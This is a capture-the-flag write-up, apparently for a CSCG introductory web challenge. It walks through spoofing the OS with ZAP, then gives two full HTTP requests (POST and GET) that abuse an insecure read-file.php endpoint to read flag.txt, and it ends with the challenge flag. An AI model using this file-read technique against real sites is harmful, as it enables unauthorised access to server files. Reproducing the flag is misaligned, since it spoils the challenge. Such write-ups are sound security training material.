### 1.Part We can spoof our OS with the help of ZAP and get the site [train.html](leaked_sites/train.html) ### 2. Part There is an unsecure statistics service which shows you the content of every file you specify. We can use this to get the content of flag.txt. Sending the following request: ```http POST https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php HTTP/1.1 host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded content-length: 17 Origin: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337 Connection: keep-alive Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/ Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 filename=flag.txt ``` Yields the page [statistics_console.html](leaked_sites/statistics_console.html) ### 3. Part A similar bug can be used with a GET request to get the content of the flag.txt file. This time we use a faulty php file called read-file.php ```http GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php?filename=flag.txt HTTP/1.1 host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/ Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 content-length: 0 ``` Returns the page [statistics_console_get.html](leaked_sites/statistics_console_get.html) ### 4.Part We now have to intercept a request made and change the authority information. When we do this we get the fourth part of the flag. ### flag CSCG{l9jj550KUaT0BVvkQ9Z39J9AW4at6R2B}